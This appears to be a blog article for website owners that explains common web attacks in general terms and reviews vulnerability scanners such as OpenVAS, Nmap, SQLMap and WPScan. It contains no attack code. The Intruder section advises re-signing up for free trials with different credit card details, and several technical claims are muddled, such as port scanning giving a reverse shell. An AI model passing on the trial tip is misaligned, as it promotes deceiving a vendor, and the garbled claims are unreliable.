Website Security 101: Fix Vulnerabilities in Your Website using the 9 best Tools to Scan for Vulnerabilities
Do you own any sort of website? Do you think it has many vulnerabilities? Worried it might be hacked? It probably will! But don’t worry, in this article I will walk you through how you can protect your website from any vulnerabilities and hackers.
Ever since the dawn of the internet and websites being launched, vulnerabilities and hackers have been a huge issue. Hackers usually try and find vulnerabilities in any system that they can exploit and make profits.
Your website is no exception to such attacks. Suppose your website is compromised by such an attacker. In that case, much of your sensitive information could get stolen, and you could even end up losing your website!
In this article, we shall explore the most found vulnerabilities in 2021 that could compromise your website, how to detect them yourself and even eliminate them.
📑 Table of Contents
- The World of Vulnerabilities
- Website Vulnerabilities 101
How to Attack a Website
Be Your Own Vulnerability Analyst
- Vulnerability Scanners
- The Best 9 Vulnerability Scanners for Your Website!
Image Source – information-age.com
A vulnerability basically is a flaw that any malicious third party can take advantage of to make personal gains or profits. A vulnerability is any bug or flaw in the hardware or software in a computer system, allowing a hacker to compromise the system, as mentioned before.
No matter how carefully you might configure and setup your system, it is bound to have a vulnerability.
Don’t get upset with yourself just yet; a vulnerability is not always your fault as a user. A vulnerability might even exist in a system because the manufacturer or vendor wasn’t careful while configuring it.
These vulnerabilities, if left unpatched, may definitely cause a lot of trouble and lead to severe damage to the system.
If you take a look at one of the most prominent ransomware cases in recent history, WannaCry, this was caused due to a vulnerability in the Windows OS. It was discovered by the US National Security Agency (NSA), who did not inform Microsoft of it and even developed an exploit for the vulnerability.
Image Source – techcrunch.com
All the WannaCry trouble started when this exploit was stolen by the Shadow Brokers hacker group from the NSA. The group, in turn, managed to infect over 200,000 computers in over 150 countries and managed to cause over $4 billion in total loss.
Another example of a vulnerability from recent times is the Colonial Pipelines ransomware attack. While it only made $4.4 million in ransom (most of which has been recovered), it too incurred many losses to the company.
However, this ransomware attack occurred due to a compromised password, which in itself is a vast vulnerability caused due to lack of proper oversight.
In short, a vulnerability allows a hacker to gain access to any system, gather sensitive information and make a profit for themselves. The more vulnerabilities your system has, the more likely you will be hacked, no matter how insignificant you might think you are.
Image Source – flyingcowdesign.com
The easiest way a hacker can gain access to your sensitive information is through a vulnerable website that stores this information. It might be a social media website, a shopping website or even a personal website that you host.
While the security of the shopping or social media websites isn’t in your control, that of your personal websites is in your hands.
With almost 1.8 billion websites on the internet, they can be broadly categorised into 3 types:
- Hand-Coded websites are created the old-fashioned way with a text editor, HTML and a bit of CSS. This is probably the first website you ever created while you were a kid in high school.
- The Websites built using various builder tools, which are usually available online. These didn't have a lot of functionality but were just something to get more people into web designing during the early age of the internet.
- Finally, we have modern CMS-based websites. CMS stands for Content Management System with advanced tools and features that allow a user to create a website with minimal effort and a lot of functionality.
Due to the time-consuming nature of the hand-coded websites and the lack of functionality for the website builder tool, CMS-based websites are far more common these days.
But even so, hand-coded websites aren't entirely obsolete. This is because they allow a user to be aware of all security flaws in the website as compared to the CMS-based ones whose code and vulnerabilities are freely available on the internet.
Due to this, CMS-based sites will constantly be hacked in bulk as a website built using a standard CMS will have the same vulnerabilities. Hand Coded ones will require more in-depth research to find their vulnerabilities.
A website can be attacked to exploit various different resources, sometimes to gain access to the server running it, and sometimes to extract information from databases. Let us look at a few of these attacks in the next section.
A malicious third party may attack your website for various reasons. Maybe a vulnerability was found in the CMS you use, and you were in the bulk of users attacked. Perhaps you were targeted by someone who wishes to steal your identity, or the most unlikely, you were on the government watchlist, and they just decided to take you out.
Paranoia is a key factor in fighting hackers by preparing for the worst-case scenario.
But let's not go off-topic. If it has any vulnerabilities, your website will definitely fall victim to a malicious attack sooner or later unless the vulnerability is patched.
Attacks against a website may come in various shapes and sizes; I have listed a few of my personal favourites and the most popular below.
As a database enthusiast, this is my favourite vulnerability or attack against a website.
An SQL injection is simply an attack executed by entering database queries into a text box or input field available on your website. If your backend doesn’t properly sanitise all input it accepts, it is bound to return data to a hacker on an attempted SQL injection
Image Source – portswigger.net
A good attacker knows to anticipate the model of your database using common filed and table names and enters relevant query to return this data from the database.
While the SQL injection is targeted at your website itself, Cross-Site scripting targets your website's visitors. This will be quite a problem if you own a [popular website with a good rate of visitors.
Like SQL injection, XSS also operates using input fields. Still, instead of database queries, the hacker, in this case, injects scripts. If the input, like before, isn’t sanitised properly will cause the script to run on the visitor’s browser.
Image Source – portswigger.net
Since browsers can’t tell whether the script is part of the website or not, they don’t block it either.
An XSS script can be easily used to hijack a user session or session data, such as login information or other sensitive data/messages. I don't have to explain to you how a hacker can misuse such data, do I?
Personally, I believe this is one of the most dangerous attacks that can be done against any website, since it potentially allows a hacker to hijack an entire website with ease.
Using such a vulnerability, an attacker can pass commands as input passed to the server running the website that executes it. This mainly includes cookies, HTTP headers, or even forms that aren’t validated or sanitised.
Image Source – portswigger.net
The attacker simply has to find out what system the server is running on, which most probably would be open-source information. The attacker then passes server-specific shell commands to execute any command the attacker requires.
Using Command injection, a hacker could potentially take over an entire website by owning its server, gather all information stored on it and even use the server as a botnet for future attacks.
This attack is quite often overlooked by server admins, who might not take proper action to prevent them.
File Inclusion vulnerability takes advantage of the server-side scripting language running the website by making the code import a file specified by the attacker. This file could be hosted by the attacker remotely (Remote File Inclusion or RFI) or be available on the server itself (Local File Inclusion or LFI).
Image Source – imperva.com
Let me explain a simple example. Consider a server with PHP as its server-side scripting language. PHP uses the include keyword to include libraries of functions to be used within the program body.
An attacker can simply specify the path to their file using an include keyword that can be supplied using any non-sanitised input field. The program will copy the script in the included file to its body and execute it.
When I said that Command Injection is only one of the most dangerous website attacks, the other dangerous one I meant was File Inclusion.
This vulnerability allows an attacker to take over the server along with the website, deliver malicious payloads to the server that can infect website visitors, and even include malicious code in any cookies that the website stores on every visitor system.
Well, port scanning is technically not a website attack but is a form of reconnaissance performed to gather details of the ports on a server hosting a website.
I included it here simply due to it’s the simplicity it offers to an attacker to gather sensitive information about the server communication protocols. It allows a hacker to find out the services running on the server, possibilities of login to the server without a password, different kind of authentication required and more.
Suppose any service is currently running on the server as a known vulnerability. In that case, the hacker can find dozens of tools and code online that can help them exploit this vulnerability.
Image Source – varonis.com
Port scanning is especially dangerous since it allows the hacker to gain a reverse shell to the server that can be used to execute any commands to compromise the system. While a port scan itself can be detected, whatever comes after it isn’t detectable unless you’re looking for it.
Mostly port scans are effective when a server does not have any firewalls or security protocols in place and also while running vulnerable services with known exploits.
There's no point in understanding various attacks on your website if you can't prevent them by yourself. Not everyone can afford a penetration tester to look at your website and find vulnerabilities.
Even though I can't turn you into a world-renown cybersecurity analyst in the duration of this article, I sure can point you in the right direction with a few tips and pointers.
Image Source – logsign.com
Well, the best way to see if you are running a website with vulnerabilities is to attack your own website. And by attack yourself, I mean sit down with a computer and some groovy music playing in the background, and manually test for every vulnerability that your website may have.
I would ask you to try this only if you host your own website and not if any CMS is involved. Also, it might be a good idea to do this only if you have a bit of experience in networking and such.
While we don’t have to go into actual attacks, by sending any payloads, we sure can make do with a bit of reconnaissance against your website.
Image Source – hackingblogs.com
Netcraft is an online service that allows you to gather all open-source information available relating to any domain address that you want. I always use Netcraft first while performing any sort of reconnaissance since it gives you a general idea of the website.
Various information that Netcraft provides includes registrar details, WHOIS information, open ports, hosting service etc.
To check this information, simply visit the Netcraft website and enter your website address in the search bar. When results are returned, just make sure that none of your personal information is shown here when you search for your website.
Other websites that you can use for similar functions are Shodan or Censys, but I prefer Netcraft as it is easier to understand and it is also free.
Image Source – pentestnote.me
Remember the port scanning I mentioned in the previous section? Nmap is a tool used to perform port scanning. You can use it to investigate all ports open and services running on any computer system.
Once you run a port scan, you can see what all services are running on your system as well as all ports that can be accessed externally. You simply need to use any exploit database, such as Exploit-DB or Rapid7, to search these services and ports to find any live exploits against them.
If there are no exploits, you're good to go. But in case there are exploits available for these services, you need to patch them or install proper security firewalls to protect them.
You can find a Nmap scanner online for use. You just need to enter the target details.
There are a few more manual methods in which you can "Attack" your own website to find vulnerabilities like SQL injection, XSS scripts and more. But since they are pretty complicated concepts, I wouldn't want to overcrowd your brain with them.
We dealt with hand-coded websites in the previous section, and yes, those methods can be extended to the CMS-based ones as well. But CMS-based websites have additional problems that you would need to deal with.
If you are running your website on a CMS-based system such as WordPress, Squarespace, Joomla, Wix etc., you have the vulnerability of the CMS system itself to worry about. According to various market statistics WordPress, Joomla, Drupal etc., are some of the most popular CMS systems currently.
Image Source – w3techs.com
If you use one of these 3 CMS systems, let's look at a few ways to detect vulnerabilities in your websites.
The 4 top vulnerability scanners for WordPress are – WPXF, WPScan, WPSeku, and WPForce. Of the 4 available ones, my personal favourite and the most popular scanner is the WPScan.
WPScan allows you to scan your WordPress website, allowing it to brute force the admin panel of your website, fetch the version of the WordPress you're running, spot open directories, detect all the additional plugins installed and much more.
Image Source – tecmint.com
WPScan works by using the WordPress Vulnerability Database that provides a vast list of exploits and currently contains more than 21,850 vulnerabilities.
However, there are a few issues with the scanner from my personal experience. Firstly, WPScan has a few complicated controls and keys functionality, which could be more user-friendly.
Secondly, even though the whole scanner is quite fast, the plugin scanner itself takes a long time to complete.
Here too, there are quite a few different scanners available, but my choice for Joomla would be the JoomScan. It was created by the Open Web Application Security Project (OWASP) and is very similar to the WPScan tool we looked at earlier.
Image Source – geeksforgeeks.org
The one thing I found quite helpful in the JoomScan tool was its ability to pinpoint outdated versions running on the website and even providing a link to its exploit.
You can use JoomScan to detect any file misconfigurations, detect firewalls and security protocols, as well as enumerating Joomla components installed along with their version.
The one feature missing from this tool is the ability to Brute force admin logins, which is, however, not very important. I found that most Joomla websites use a powerful plugin known as Stop Brute Force which prevents any attempts.
Other common Joomla scanners include JoomlaVS and JScanner.
The Drupal vulnerability scanner that I will explain is called DroopeScan. This is actually one of the only scanners available for Drupal and is not quite as good as the scanners in the previous sections.
Image Source – sectechno.com
To start off, firstly, Drupal is quite basic in every sense of the term as it gathers only the basic website information of any Drupal website. This information might already be openly available on the internet using tools such as Netcraft, Shodan etc.
But however, you can use the basic details returned by Drupal to manually go to any exploit database to search up whether any vulnerabilities exist on your website and whether there are exploits that exist for it.
To be honest, I believe the lack of a proper vulnerability scanner for Drupal is due to its lack of popularity and also since there aren’t many websites out there running on Drupal either.
Unfortunately, there aren’t many other website scanners for CMS systems out in the market which actually function well. Also, since most websites run WordPress anyway, most scanners available support WordPress instead.
One drawback that most people might find with a CMS scanner is that even though they’re all freeware, they do require a Linux OS to run. But I’ve got a solution for that too.
If you don’t have a Linux system, just download any virtualisation software off the internet. I personally prefer VirtualBox for its myriad of features and customisability. You then simply need to download a Linux Image (Kali Linux preferably) and install it onto the virtualisation software.
Voila! You have your very own Linux OS to run scanners in! I recommend using Kali Linux because it is customised to be used for such operations and sometimes comes with such scanners pre-installed.
Finally, I would also suggest you keep yourself informed about any vulnerability that was discovered in the CMS system as this might be cause for a bulk hack of all websites running the same CMS. Such vulnerabilities can't be fixed by you, but you can take a few precautions to avoid getting targeted.
Well, being the busy bee you are, you might not always have the time and patience to sit down and manually find the vulnerabilities on your website or even be bothered with the CMS scanners.
Automated Vulnerability Scanners exist just for people like this, even you and me. These scanners aggressively scan your web server or web applications for any and every vulnerability that requires your attention.
These scanners will also find any outdated versions running on your website and report them to you or even sometimes link you to an exploit for its vulnerability. They mainly function using known vulnerabilities available on exploit databases and checking the system you run against these databases.
However, in my experience, none of these scanners uncovers any 0-day vulnerabilities in your system. That task is still up to you or a penetration tester.
Most of these scanners do perform black-box testing as well, so you don’t need to be worried about the code or internal mechanics of your web server or applications.
I will explore Automated Vulnerability Scanners in detail in the upcoming sections.
Image Source – blogvault.net
If all else fails, you pretty much don't have any other choice when it concerns your website. Yes, this option is a bit too far-fetched for a regular user. But if your website is your primary source of income and you have a lot of sensitive data that you could lose in a website hack, you pretty much need help.
Mind you, I don’t recommend hiring a professional if you are a part-time blogger running a WordPress website. You can find vulnerabilities with your website yourself, and it wouldn't be cost-efficient for you to hire a professional.
A professional penetration tester will use various tools and software to analyse your website – web server and web applications, to find any vulnerabilities that may exist. He will also test out some known exploits to see if these vulnerabilities are exploitable.
A penetration tester will then submit a report of all findings as well as his suggestions on how you can remove the vulnerabilities on your website as well as how to improve the security of your website by minimising future risks.
One positive aspect of hiring a professional penetration tester is that they will also look for any 0-day vulnerabilities that may exist on your system. But mind you, such services would be increasingly expensive.
I would ask you to hire a penetration tester only if your website and the profit from it is worth at least twice as much as the cost incurred for a penetration tester. Otherwise, it is simply not worth it.
Image Source – netsparker.com
The key purpose of an automated vulnerability scanner is to find all vulnerabilities in a system and prevent any malicious actor from exploiting these vulnerabilities to cause any damage to the system or extract any sensitive data.
Website Vulnerability Scanners perform the same function but are generally targeted to scan web applications and web servers that run the website.
There are mainly 4 types of vulnerability scanners:
- Cloud-Based Vulnerability Scanners – used to find vulnerabilities in cloud-based systems like web applications
- Host-Based Vulnerability Scanners – used to find vulnerabilities on an individual system or a network device such as a router
- Network-Based Vulnerability Scanners – used to find vulnerabilities in an entire network and scans all ports to find any vulnerable services that might be running
- Database-Based Vulnerability Scanners – used to find vulnerabilities in database management systems that usually form the backbone of any system storing all system-related data
Even though vulnerability scanner tools are usually used in a corporate environment, they are more than suited for personal uses due to their ease of use and simplicity. Although, it is a general rule to have a basic understanding of network security and vulnerabilities while using such a tool so that you can understand the results and don’t have to google everything.
Now, let’s look at a few of the best vulnerability scanners for your website.
Image Source – bujarra.com
OpenVAS is my go-to vulnerability scanner while dealing with any system, be it a web server or an individual computer system. I never begin a penetration test without running OpenVAS once.
It is very user friendly and doesn't need a lot of time to learn. You could just install it and immediately start using it with no trouble or additional plugin requirements.
OpenVAS supports large scale scans of an entire organisation’s network and is quite efficient as well as accurate when it comes to discovering vulnerabilities.
With almost 80,000 different vulnerability tests, OpenVAS can detect SQL injection, Cross-Site Scripting, authenticated and unauthenticated testing, and even industrial level performance tuning. Remember the different vulnerabilities/attacks we looked at earlier? OpenVAS can prevent every single one of them.
It also suggests measures to eliminate vulnerabilities as well as helps in risk assessment of your system. Finally, it also receives updates almost every day, thereby keeping it at the top of its game.
Image Source – carvesystems.com
While Nmap isn't an automated vulnerability scanner like OpenVAS, it is on this list due to its versatility as a vulnerability scanner. It is also effortless to use making it the best choice for beginners. It was the first-ever vulnerability scanner that I've used in my life, and I still do.
The basic Nmap scanner can probe different networks to find different hosts and services running on it, along with even detecting the operating systems on the various hosts. Using this information gathered, you’d have to manually search exploit databases to find vulnerabilities on the system.
But this is overcome using the many scripts available for Nmap that turn it into a beast that is able to detect vulnerability in your web server or web applications. Once upgraded, it is also able to detect any outdated versions running on your website as well as adapting to the system based on latency & congestion of the scan.
While it was initially released only for Linux OS, it now is available for other operating systems as well, such as Windows and Mac.
The only issue I have with Nmap is the lack of a proper functioning GUI, and it has to run in a terminal command window which might be a bit dull to use.
Image Source –sqlmap.org
SQLMap isn’t your typical vulnerability scanner that scans your entire system for vulnerabilities; it is a database scanner tool that is specifically made to find vulnerabilities in your database system.
Since a database forms the backbone of any website as well as stores all the sensitive information pertaining to a website, securing the website will make sure the damage from attacks is mitigated to a good extent.
SQLMap is an open-source penetration testing tool that allows you to automate the entire SQL injection process for the database used by your website. It supports six different types of SQL injection techniques, namely – time-based blind, UNION query, stacked queries, Boolean-based blind, error-based, and out-of-band.
It also supports a variety of database servers such as MySQL, SQL Server, Oracle, SQLite etc.
Image Source – wordpress.org
Sucuri is a quite popular malware and security scanner for your web server as well as web applications.
Sucuri offers vulnerability testing against a lot of exploits such as SQL injections, XSS scripts, tests for malware on the webserver and more.
It also offers a paid version that works as a security system for your website, offering an incident response, protection against hacks such as DDoS, improved page loading speed etc. But at $199/month, this service is too expensive for us regular users.
To scan your website, you simply have to visit the Sucuri online website and enter your website address to gather all the details about your vulnerabilities.
The one thing I like about Sucuri is that it not only works with your in-house website but can also scan for vulnerabilities on any CMS-based systems such as WordPress, Joomla, Magento etc.
Image Source – geekflare.com
Intruder is a vulnerability scanner specifically designed for cloud-based environments. It can scan your web applications and any CMS systems that you use for your website.
It also prioritises results for you based on their context. The main functions of the Intruder vulnerability scanner include detecting out-of-date versions, uninstalled patches, any misconfigured settings, SQL injection and XSS script possibilities and also any issues that may exist in the CMS system running on your website.
Even though most of the functionalities are available in the free-trial, it only lasts 30 days. The paid version starts at $97/month, which, while is less expensive than Sucuri, is still quite costly for a regular user.
A tip I would suggest is that you keep using the free-trial, and after it expires, register for a new free-trial with different credit card details.
Image Source – blackmoreops.com
Coming back to the world of free vulnerability scanners, Grabber is a vulnerability scanner that solely works to find vulnerabilities in any web applications that you run on your website. One thing that I have to tell you before everything is that, even after extended use, I found this scanner to be a bit slower than most others on this list.
But what redeems the Grabber Vulnerability scanner is its versatility, portability and simplicity, even with the lack of a proper GUI. I have put this tool on this list purely as a recommendation for personal use and nothing else.
What I found interesting is that being open-source, you can go and edit the source code, which is in python, to add new functionalities. For a seasoned programmer or network engineer, this is an outstanding feature.
In terms of vulnerability detection, it can detect Cross-Site Scripting, SQL Injection, File Inclusion, Source code analyser attacks, and even Ajax testing. This is where the versatility of the tool trumps its overall speed.
In short, this tool can do a lot of things but at a slow pace which, in my books, is a decent trade-off.
Image Source – techcrunch.com
I wouldn’t write this list without one of the only crowdsourced vulnerability scanners in the market. Created for ethical hackers by ethical hackers is the most fantastic feature of Detectify.
The tool can perform web server and application scans for your website along with an asset monitoring system and can identify over 1500 different vulnerabilities. The asset monitor mainly exists to continually scan sub-domains and directories for any slight chance of a breach by malicious parties.
However, the scanner is a paid one with only 2 weeks of free-trial. I wouldn’t recommend the scanner unless you don’t mind spending around $85/month for the basic version of the tool.
You could easily get most of the functionalities offered by this tool with many of the free scanners that I listed earlier in the section.
Image Source – securitytrails.com
Nikto2 is yet another vulnerability scanner that works primarily on web applications. Being an open-source project, Nikto2 is freeware, and the source code can be customised according to your needs.
But the reason for Nikto2 to make this list simply is the volume of vulnerability that it can detect with almost 6700 detectable vulnerabilities. It is also frequently updated, thereby keeping the entire system fresh with any new 0-days that have been found.
The most common functionalities include detecting misconfigurations, outdated software versions, as well as alert on server configuration issues. The scanner can also do quick scans to detect any vulnerabilities.
One issue I had with this scanner, however, is the lack of any system that suggests measures to eliminate the vulnerabilities or improve the overall security of the system.
Image Source – solodev.com
Netsparker, even though the last entry on the list, is by no means any less of a vulnerability scanner in the market. Being specialised for web applications, Netsparker can virtually scan thousands of web applications for vulnerabilities within only a few hours. This speed is rarely available in any other such tools.
The scanner also has a crawler system that can crawl a web application in order to find a vulnerability, and this makes the entire system quite thorough and efficient.
Netsparker also gives suggestions as to how to eliminate vulnerabilities and improve security as well as mitigate any damage caused by an attack on the website.
The only reason for which I've put this at the end of the list simply is that it is built mainly for enterprise clients and is also a paid tool.
Summing up, I would say that a vulnerability on any system, no matter how secure, will definitely exist. And if this vulnerability exists on a website, it is especially worse due to all the additional remote attacking capabilities that open up.
We looked at quite a few such website vulnerabilities and how you can take on the task of finding these yourself while improving the security of your website. At the end of the day, it doesn't matter what method you chose to enhance your website security. As long as you were thorough, it should do the job.
If you liked this article or want to add any new information or vulnerability scanner tool, please leave a comment below and let us know!